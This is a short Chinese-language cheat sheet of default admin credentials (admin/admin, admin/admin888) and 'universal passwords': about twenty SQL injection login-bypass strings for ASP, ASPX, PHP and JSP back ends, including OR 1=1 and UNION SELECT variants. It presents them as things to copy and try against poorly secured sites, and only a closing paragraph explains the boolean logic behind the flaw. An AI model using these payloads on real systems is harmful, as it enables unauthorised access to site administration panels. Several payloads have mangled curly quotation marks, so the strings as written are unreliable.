标题弱口令与万能密码
渗透常用万能密码
碰到脑残站点时 直接复制测试
好多后台默认密码
账号: admin
密码:admin
账号:admin
密码:admin888
账号:admin
密码:域名名
上面这些是弱口令,是因为网站管理员的安全意识太差了所以存在于这个奇怪的世界,我们可以按照管理员的习惯(社工,)一个一个试着猜几个(万一对了呢,)
## asp aspx万能密码
1:"or “a”="a
2: ')or(‘a’=‘a
3:or 1=1–
4:‘or 1=1–
5:a’or’ 1=1–
6:"or 1=1–
7:‘or’a’=‘a
8:“or”="a’=‘a
9:‘or’’=’
10:‘or’=‘or’
11: 1 or ‘1’=‘1’=1
12: 1 or ‘1’=‘1’ or 1=1
13: 'OR 1=1%00
14: "or 1=1%00
15: 'xor
16: 新型万能登陆密码
用户名 ’ UNION Select 1,1,1 FROM admin Where ‘’=’ (替换表名admin)
密码 1
Username=-1%cf’ union select 1,1,1 as password,1,1,1 %23
Password=1
17账号:…admin’ or ‘a’='a 密码随便填
## PHP万能密码
‘or’=‘or’
'or 1=1/* 字符型 GPC是否开都可以使用
User: something
Pass: ’ OR ‘1’='1
jsp 万能密码
1’or’1’='1
admin’ OR 1=1/*
用户名:admin 系统存在这个用户的时候 才用得上
密码:1’or’1’='1
万能密码得于利用 全归功于以下的OR 和程序员所编写的程序
and逻辑运算的结果:真----真=真;假----真=假; 真----假=假; 假----假=假.
or逻辑运算的结果:真----真=真;假----真=真; 真----假=真; 假----假=假.
(万能密码是因为程序员编写程序是出现了逻辑错误!)